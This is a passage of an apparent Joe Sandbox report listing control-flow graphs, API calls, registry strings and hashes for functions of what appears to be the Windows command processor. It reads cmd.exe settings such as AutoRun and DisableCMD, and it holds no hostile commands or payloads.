515->519 520 7ff789bd44cd-7ff789bd44e5 515->520 516->519 521 7ff789bd4696-7ff789bd46a0 519->521 522 7ff789bd46a2-7ff789bd46ac 519->522 523 7ff789bd47a3-7ff789bd47a9 520->523 524 7ff789bd44eb-7ff789bd44f2 520->524 521->522 525 7ff789bd46ae-7ff789bd46b5 call 7ff789bd97bc 521->525 522->525 526 7ff789bd4705-7ff789bd4707 522->526 527 7ff789bd45ff-7ff789bd4607 524->527 528 7ff789bd44f8-7ff789bd4507 524->528 540 7ff789bd4703 525->540 541 7ff789bd46b7-7ff789bd4701 call 7ff789c1c038 525->541 526->520 530 7ff789bd470d-7ff789bd472a call 7ff789bccd90 526->530 527->528 531 7ff789bd460d 527->531 532 7ff789bd4612-7ff789bd4616 528->532 533 7ff789bd450d-7ff789bd4512 call 7ff789bd5cb4 528->533 548 7ff789bd472c-7ff789bd4738 _local_unwind 530->548 549 7ff789bd473d-7ff789bd4767 call 7ff789bd13e0 call 7ff789be9eec call 7ff789bcff70 _local_unwind 530->549 536 7ff789bd476c-7ff789bd4773 531->536 538 7ff789bd461c-7ff789bd4633 532->538 539 7ff789bd47d7-7ff789bd47df 532->539 545 7ff789bd4517-7ff789bd455e call 7ff789bd33f0 call 7ff789bd498c 533->545 536->528 546 7ff789bd4779-7ff789bd4780 536->546 544 7ff789bd47f2-7ff789bd483c call 7ff789bcff70 DeleteProcThreadAttributeList call 7ff789bd8f80 538->544 543 7ff789bd47e1-7ff789bd47ed CloseHandle 539->543 539->544 540->526 541->526 543->544 568 7ff789bd4564-7ff789bd4579 call 7ff789bd498c 545->568 569 7ff789bd47ae-7ff789bd47ca call 7ff789bd33f0 545->569 546->528 552 7ff789bd4786-7ff789bd4789 546->552 548->549 549->536 552->528 558 7ff789bd478f-7ff789bd4792 552->558 558->523 562 7ff789bd4794-7ff789bd479d call 7ff789bea250 558->562 562->523 562->528 568->544 576 7ff789bd457f-7ff789bd4584 call 7ff789bea920 568->576 569->539 576->544
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                                                                                                                    • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                                                                                                                    • API String ID: 388421343-2905461000
                                                                                                                    • Opcode ID: a39f4a529f52f64395c69d74f8e47fafd60531de1d64f261e5ad8184ef12a4c8
                                                                                                                    • Instruction ID: b4e903eed802f40e9525ce57264badc599e2c24fa786fcd63b5b36c69964f04a
                                                                                                                    • Opcode Fuzzy Hash: a39f4a529f52f64395c69d74f8e47fafd60531de1d64f261e5ad8184ef12a4c8
                                                                                                                    • Instruction Fuzzy Hash: BEF14131A09B8A86EA60AF11E4487B9FBB5FB85F92FA44135D94D43794DF3CE444CB20
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD5554 Relevance: 45.8, APIs: 18, Strings: 8, Instructions: 295registryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 579 7ff789bd5554-7ff789bd55b9 call 7ff789bda640 582 7ff789bd55bc-7ff789bd55e8 RegOpenKeyExW 579->582 583 7ff789bd55ee-7ff789bd5631 RegQueryValueExW 582->583 584 7ff789bd5887-7ff789bd588e 582->584 585 7ff789bdf248-7ff789bdf24d 583->585 586 7ff789bd5637-7ff789bd5675 RegQueryValueExW 583->586 584->582 587 7ff789bd5894-7ff789bd58db time srand call 7ff789bd8f80 584->587 591 7ff789bdf260-7ff789bdf265 585->591 592 7ff789bdf24f-7ff789bdf25b 585->592 588 7ff789bd568e-7ff789bd56cc RegQueryValueExW 586->588 589 7ff789bd5677-7ff789bd567c 586->589 596 7ff789bdf2b6-7ff789bdf2bb 588->596 597 7ff789bd56d2-7ff789bd5710 RegQueryValueExW 588->597 594 7ff789bd5682-7ff789bd5687 589->594 595 7ff789bdf28b-7ff789bdf290 589->595 591->586 593 7ff789bdf26b-7ff789bdf286 _wtol 591->593 592->586 593->586 594->588 595->588 599 7ff789bdf296-7ff789bdf2b1 _wtol 595->599 600 7ff789bdf2ce-7ff789bdf2d3 596->600 601 7ff789bdf2bd-7ff789bdf2c9 596->601 602 7ff789bd5712-7ff789bd5717 597->602 603 7ff789bd5729-7ff789bd5767 RegQueryValueExW 597->603 599->588 600->597 604 7ff789bdf2d9-7ff789bdf2f4 _wtol 600->604 601->597 605 7ff789bd571d-7ff789bd5722 602->605 606 7ff789bdf2f9-7ff789bdf2fe 602->606 607 7ff789bd579f-7ff789bd57dd RegQueryValueExW 603->607 608 7ff789bd5769-7ff789bd576e 603->608 604->597 605->603 606->603 611 7ff789bdf304-7ff789bdf31a wcstol 606->611 609 7ff789bd57e3-7ff789bd57e8 607->609 610 7ff789bdf3a9 607->610 612 7ff789bd5774-7ff789bd578f 608->612 613 7ff789bdf320-7ff789bdf325 608->613 616 7ff789bdf363-7ff789bdf368 609->616 617 7ff789bd57ee-7ff789bd5809 609->617 624 7ff789bdf3b5-7ff789bdf3b8 610->624 611->613 614 7ff789bd5795-7ff789bd5799 612->614 615 7ff789bdf357-7ff789bdf35e 612->615 618 7ff789bdf34b 613->618 619 7ff789bdf327-7ff789bdf33f wcstol 613->619 614->607 614->615 615->607 620 7ff789bdf38e 616->620 621 7ff789bdf36a-7ff789bdf382 wcstol 616->621 622 7ff789bd580f-7ff789bd5813 617->622 623 7ff789bdf39a-7ff789bdf39d 617->623 618->615 619->618 620->623 621->620 622->623 625 7ff789bd5819-7ff789bd5823 622->625 623->610 626 7ff789bd582c 624->626 627 7ff789bdf3be-7ff789bdf3c5 624->627 625->624 628 7ff789bd5829 625->628 629 7ff789bd5832-7ff789bd5870 RegQueryValueExW 626->629 630 7ff789bdf3ca-7ff789bdf3d1 626->630 627->629 628->626 631 7ff789bd5876-7ff789bd5882 RegCloseKey 629->631 632 7ff789bdf3dd-7ff789bdf3e2 629->632 630->632 631->584 633 7ff789bdf3e4-7ff789bdf412 ExpandEnvironmentStringsW 632->633 634 7ff789bdf433-7ff789bdf439 632->634 635 7ff789bdf414-7ff789bdf426 call 7ff789bd13e0 633->635 636 7ff789bdf428 633->636 634->631 637 7ff789bdf43f-7ff789bdf44c call 7ff789bcb900 634->637 639 7ff789bdf42e 635->639 636->639 637->631 639->634
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: QueryValue$CloseOpensrandtime
                                                                                                                    • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                                                                                    • API String ID: 145004033-3846321370
                                                                                                                    • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                                                    • Instruction ID: 80abdf1a29dad377d8dae6f07b4cd7864bf9554a47194cd5cc6fd5bbaefcd3e6
                                                                                                                    • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                                                    • Instruction Fuzzy Hash: B2E1953252DA8AC6E750AF10E45457AFBB0FB89B52FE05135E68E02A58EF7CD544CB20
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD37D8 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 269registrythreadmemoryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 821 7ff789bd37d8-7ff789bd3887 GetCurrentThreadId OpenThread call 7ff789bd04f4 HeapSetInformation RegOpenKeyExW 824 7ff789bd388d-7ff789bd38eb call 7ff789bd5920 GetConsoleOutputCP GetCPInfo 821->824 825 7ff789bde9f8-7ff789bdea3b RegQueryValueExW RegCloseKey 821->825 828 7ff789bdea41-7ff789bdea59 GetThreadLocale 824->828 829 7ff789bd38f1-7ff789bd3913 memset 824->829 825->828 830 7ff789bdea74-7ff789bdea77 828->830 831 7ff789bdea5b-7ff789bdea67 828->831 832 7ff789bdeaa5 829->832 833 7ff789bd3919-7ff789bd3935 call 7ff789bd4d5c 829->833 834 7ff789bdea94-7ff789bdea96 830->834 835 7ff789bdea79-7ff789bdea7d 830->835 831->830 838 7ff789bdeaa8-7ff789bdeab4 832->838 841 7ff789bdeae2-7ff789bdeaff call 7ff789bc3240 call 7ff789be8530 call 7ff789bd4c1c 833->841 842 7ff789bd393b-7ff789bd3942 833->842 834->832 835->834 837 7ff789bdea7f-7ff789bdea89 835->837 837->834 838->833 840 7ff789bdeaba-7ff789bdeac3 838->840 843 7ff789bdeacb-7ff789bdeace 840->843 853 7ff789bdeb00-7ff789bdeb0d 841->853 847 7ff789bdeb27-7ff789bdeb40 _setjmp 842->847 848 7ff789bd3948-7ff789bd3962 _setjmp 842->848 844 7ff789bdeac5-7ff789bdeac9 843->844 845 7ff789bdead0-7ff789bdeadb 843->845 844->843 845->838 851 7ff789bdeadd 845->851 849 7ff789bdeb46-7ff789bdeb49 847->849 850 7ff789bd39fe-7ff789bd3a05 call 7ff789bd4c1c 847->850 848->853 854 7ff789bd3968-7ff789bd396d 848->854 855 7ff789bdeb66-7ff789bdeb6f call 7ff789bd01b8 849->855 856 7ff789bdeb4b-7ff789bdeb65 call 7ff789bc3240 call 7ff789be8530 call 7ff789bd4c1c 849->856 850->825 851->833 866 7ff789bdeb15-7ff789bdeb1f call 7ff789bd4c1c 853->866 858 7ff789bd396f 854->858 859 7ff789bd39b9-7ff789bd39bb 854->859 880 7ff789bdeb71-7ff789bdeb82 _setmode 855->880 881 7ff789bdeb87-7ff789bdeb89 call 7ff789bd86f0 855->881 856->855 867 7ff789bd3972-7ff789bd397d 858->867 862 7ff789bdeb20 859->862 863 7ff789bd39c1-7ff789bd39c3 call 7ff789bd4c1c 859->863 862->847 877 7ff789bd39c8 863->877 866->862 874 7ff789bd397f-7ff789bd3984 867->874 875 7ff789bd39c9-7ff789bd39de call 7ff789bcdf60 867->875 874->867 883 7ff789bd3986-7ff789bd39ae call 7ff789bd0580 GetConsoleOutputCP GetCPInfo call 7ff789bd04f4 874->883 875->866 889 7ff789bd39e4-7ff789bd39e8 875->889 877->875 880->881 890 7ff789bdeb8e-7ff789bdebad call 7ff789bd58e4 call 7ff789bcdf60 881->890 897 7ff789bd39b3 883->897 889->850 894 7ff789bd39ea-7ff789bd39ef call 7ff789bcbe00 889->894 902 7ff789bdebaf-7ff789bdebb3 890->902 900 7ff789bd39f4-7ff789bd39fc 894->900 897->859 900->874 902->850 903 7ff789bdebb9-7ff789bdec24 call 7ff789bd58e4 GetConsoleOutputCP GetCPInfo call 7ff789bd04f4 call 7ff789bcbe00 call 7ff789bd0580 GetConsoleOutputCP GetCPInfo call 7ff789bd04f4 902->903 903->890
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                                                                                                    • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                                                                                    • API String ID: 2624720099-1920437939
                                                                                                                    • Opcode ID: 8dcb79cde60ee5e49f11697ed5384324bb8acc00ab40d250c7b11be42b6fa51b
                                                                                                                    • Instruction ID: 2436aa6c33d83ad91ce85a9e07408ea0eefe66a246b40004408f7d46e0cdb038
                                                                                                                    • Opcode Fuzzy Hash: 8dcb79cde60ee5e49f11697ed5384324bb8acc00ab40d250c7b11be42b6fa51b
                                                                                                                    • Instruction Fuzzy Hash: CAC18C31E0868A8AF754BF7094481B8FEB1FF49F56FE44138DA1E46696EE3DA441C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD823C Relevance: 15.1, APIs: 10, Instructions: 116COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1118 7ff789bd823c-7ff789bd829b FindFirstFileExW 1119 7ff789bd82cd-7ff789bd82df 1118->1119 1120 7ff789bd829d-7ff789bd82a9 GetLastError 1118->1120 1124 7ff789bd8365-7ff789bd837b FindNextFileW 1119->1124 1125 7ff789bd82e5-7ff789bd82ee 1119->1125 1121 7ff789bd82af 1120->1121 1122 7ff789bd82b1-7ff789bd82cb 1121->1122 1126 7ff789bd83d0-7ff789bd83e5 FindClose 1124->1126 1127 7ff789bd837d-7ff789bd8380 1124->1127 1128 7ff789bd82f1-7ff789bd82f4 1125->1128 1126->1128 1127->1119 1129 7ff789bd8386 1127->1129 1130 7ff789bd82f6-7ff789bd8300 1128->1130 1131 7ff789bd8329-7ff789bd832b 1128->1131 1129->1120 1133 7ff789bd8332-7ff789bd8353 GetProcessHeap HeapAlloc 1130->1133 1134 7ff789bd8302-7ff789bd830e 1130->1134 1131->1121 1132 7ff789bd832d 1131->1132 1132->1120 1135 7ff789bd8356-7ff789bd8363 1133->1135 1136 7ff789bd8310-7ff789bd8313 1134->1136 1137 7ff789bd838b-7ff789bd83c2 GetProcessHeap HeapReAlloc 1134->1137 1135->1136 1140 7ff789bd8315-7ff789bd8323 1136->1140 1141 7ff789bd8327 1136->1141 1138 7ff789be50f8-7ff789be511e GetLastError FindClose 1137->1138 1139 7ff789bd83c8-7ff789bd83ce 1137->1139 1138->1122 1139->1135 1140->1141 1141->1131
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFileFindFirstLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 873889042-0
                                                                                                                    • Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                                                    • Instruction ID: 196cf54ec60c38fdba15b431657db5115ae316bfc1b8da5665afffb6fb90c31e
                                                                                                                    • Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                                                    • Instruction Fuzzy Hash: 81510776A09B8A86E740AF12E444579BFB0FB8AF92FA48131DA1D43790DF3DE454C760
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD2978 Relevance: 9.1, APIs: 6, Instructions: 138COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1142 7ff789bd2978-7ff789bd29b6 1143 7ff789bd29b9-7ff789bd29c1 1142->1143 1143->1143 1144 7ff789bd29c3-7ff789bd29c5 1143->1144 1145 7ff789bde441 1144->1145 1146 7ff789bd29cb-7ff789bd29cf 1144->1146 1147 7ff789bd29d2-7ff789bd29da 1146->1147 1148 7ff789bd29dc-7ff789bd29e1 1147->1148 1149 7ff789bd2a1e-7ff789bd2a3e FindFirstFileW 1147->1149 1148->1149 1152 7ff789bd29e3-7ff789bd29eb 1148->1152 1150 7ff789bd2a44-7ff789bd2a5c FindClose 1149->1150 1151 7ff789bde435-7ff789bde439 1149->1151 1153 7ff789bd2ae3-7ff789bd2ae5 1150->1153 1154 7ff789bd2a62-7ff789bd2a6e 1150->1154 1151->1145 1152->1147 1155 7ff789bd29ed-7ff789bd2a1c call 7ff789bd8f80 1152->1155 1157 7ff789bd2aeb-7ff789bd2b10 _wcsnicmp 1153->1157 1158 7ff789bde3f7-7ff789bde3ff 1153->1158 1156 7ff789bd2a70-7ff789bd2a78 1154->1156 1156->1156 1160 7ff789bd2a7a-7ff789bd2a8d 1156->1160 1157->1154 1161 7ff789bd2b16-7ff789bde3f1 _wcsicmp 1157->1161 1160->1145 1163 7ff789bd2a93-7ff789bd2a97 1160->1163 1161->1154 1161->1158 1165 7ff789bde404-7ff789bde407 1163->1165 1166 7ff789bd2a9d-7ff789bd2ade memmove call 7ff789bd13e0 1163->1166 1168 7ff789bde40b-7ff789bde413 1165->1168 1166->1152 1168->1168 1169 7ff789bde415-7ff789bde42b memmove 1168->1169 1169->1151
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                                                    • Instruction ID: 941d9827e2b7c2d94e2c204780a2ef4b77564c7aaa49dac1c8b8b3a0153c21b8
                                                                                                                    • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                                                    • Instruction Fuzzy Hash: 56511C61B0868A85EA30AF55954827AEA70FB54FE6FE45234DE6D077D0DF3CE441C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD4D5C Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 268memorylibraryloaderCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 643 7ff789bd4d5c-7ff789bd4e4b InitializeCriticalSection call 7ff789bd58e4 SetConsoleCtrlHandler _get_osfhandle GetConsoleMode _get_osfhandle GetConsoleMode call 7ff789bd0580 call 7ff789bd4a14 call 7ff789bd4ad0 call 7ff789bd5554 GetCommandLineW 654 7ff789bd4e4d-7ff789bd4e54 643->654 654->654 655 7ff789bd4e56-7ff789bd4e61 654->655 656 7ff789bd51cf-7ff789bd51e3 call 7ff789bc3278 call 7ff789bd4c1c 655->656 657 7ff789bd4e67-7ff789bd4e7b call 7ff789bd2e44 655->657 663 7ff789bd4e81-7ff789bd4ec3 GetCommandLineW call 7ff789bd13e0 call 7ff789bcca40 657->663 664 7ff789bd51ba-7ff789bd51ce call 7ff789bc3278 call 7ff789bd4c1c 657->664 663->664 674 7ff789bd4ec9-7ff789bd4ee8 call 7ff789bd417c call 7ff789bd2394 663->674 664->656 678 7ff789bd4eed-7ff789bd4ef5 674->678 678->678 679 7ff789bd4ef7-7ff789bd4f1f call 7ff789bcaa54 678->679 682 7ff789bd4f95-7ff789bd4fee GetConsoleOutputCP GetCPInfo call 7ff789bd51ec GetProcessHeap HeapAlloc 679->682 683 7ff789bd4f21-7ff789bd4f30 679->683 688 7ff789bd4ff0-7ff789bd5006 GetConsoleTitleW 682->688 689 7ff789bd5012-7ff789bd5018 682->689 683->682 685 7ff789bd4f32-7ff789bd4f39 683->685 685->682 687 7ff789bd4f3b-7ff789bd4f77 call 7ff789bc3278 GetWindowsDirectoryW 685->687 698 7ff789bd51b1-7ff789bd51b9 call 7ff789bd4c1c 687->698 699 7ff789bd4f7d-7ff789bd4f90 call 7ff789bd3c24 687->699 688->689 691 7ff789bd5008-7ff789bd500f 688->691 692 7ff789bd507a-7ff789bd507e 689->692 693 7ff789bd501a-7ff789bd5024 call 7ff789bd3578 689->693 691->689 695 7ff789bd5080-7ff789bd50b3 call 7ff789beb89c call 7ff789bc586c call 7ff789bc3240 call 7ff789bd3448 692->695 696 7ff789bd50eb-7ff789bd5161 GetModuleHandleW GetProcAddress * 3 692->696 693->692 709 7ff789bd5026-7ff789bd5030 693->709 724 7ff789bd50b5-7ff789bd50d0 call 7ff789bd3448 * 2 695->724 725 7ff789bd50d2-7ff789bd50d7 call 7ff789bc3278 695->725 701 7ff789bd5163-7ff789bd5167 696->701 702 7ff789bd516f 696->702 698->664 699->682 701->702 707 7ff789bd5169-7ff789bd516d 701->707 708 7ff789bd5172-7ff789bd51af free call 7ff789bd8f80 702->708 707->702 707->708 713 7ff789bd5075 call 7ff789becff0 709->713 714 7ff789bd5032-7ff789bd5059 GetStdHandle GetConsoleScreenBufferInfo 709->714 713->692 717 7ff789bd505b-7ff789bd5067 714->717 718 7ff789bd5069-7ff789bd5073 714->718 717->692 718->692 718->713 728 7ff789bd50dc-7ff789bd50e6 GlobalFree 724->728 725->728 728->696
                                                                                                                    APIs
                                                                                                                    • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4D9A
                                                                                                                      • Part of subcall function 00007FF789BD58E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF789BEC6DB), ref: 00007FF789BD58EF
                                                                                                                    • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4DBB
                                                                                                                    • _get_osfhandle.MSVCRT ref: 00007FF789BD4DCA
                                                                                                                    • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4DE0
                                                                                                                    • _get_osfhandle.MSVCRT ref: 00007FF789BD4DEE
                                                                                                                    • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4E04
                                                                                                                      • Part of subcall function 00007FF789BD0580: _get_osfhandle.MSVCRT ref: 00007FF789BD0589
                                                                                                                      • Part of subcall function 00007FF789BD0580: SetConsoleMode.KERNELBASE ref: 00007FF789BD059E
                                                                                                                      • Part of subcall function 00007FF789BD0580: _get_osfhandle.MSVCRT ref: 00007FF789BD05AF
                                                                                                                      • Part of subcall function 00007FF789BD0580: GetConsoleMode.KERNELBASE ref: 00007FF789BD05C5
                                                                                                                      • Part of subcall function 00007FF789BD0580: _get_osfhandle.MSVCRT ref: 00007FF789BD05EF
                                                                                                                      • Part of subcall function 00007FF789BD0580: GetConsoleMode.KERNELBASE ref: 00007FF789BD0605
                                                                                                                      • Part of subcall function 00007FF789BD0580: _get_osfhandle.MSVCRT ref: 00007FF789BD0632
                                                                                                                      • Part of subcall function 00007FF789BD0580: SetConsoleMode.KERNELBASE ref: 00007FF789BD0647
                                                                                                                      • Part of subcall function 00007FF789BD4A14: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A28
                                                                                                                      • Part of subcall function 00007FF789BD4A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A66
                                                                                                                      • Part of subcall function 00007FF789BD4A14: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A7D
                                                                                                                      • Part of subcall function 00007FF789BD4A14: memmove.MSVCRT(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A9A
                                                                                                                      • Part of subcall function 00007FF789BD4A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4AA2
                                                                                                                      • Part of subcall function 00007FF789BD4AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BC8798), ref: 00007FF789BD4AD6
                                                                                                                      • Part of subcall function 00007FF789BD4AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BC8798), ref: 00007FF789BD4AEF
                                                                                                                      • Part of subcall function 00007FF789BD5554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF789BD4E35), ref: 00007FF789BD55DA
                                                                                                                      • Part of subcall function 00007FF789BD5554: RegQueryValueExW.KERNELBASE ref: 00007FF789BD5623
                                                                                                                      • Part of subcall function 00007FF789BD5554: RegQueryValueExW.KERNELBASE ref: 00007FF789BD5667
                                                                                                                      • Part of subcall function 00007FF789BD5554: RegQueryValueExW.KERNELBASE ref: 00007FF789BD56BE
                                                                                                                      • Part of subcall function 00007FF789BD5554: RegQueryValueExW.KERNELBASE ref: 00007FF789BD5702
                                                                                                                    • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4E35
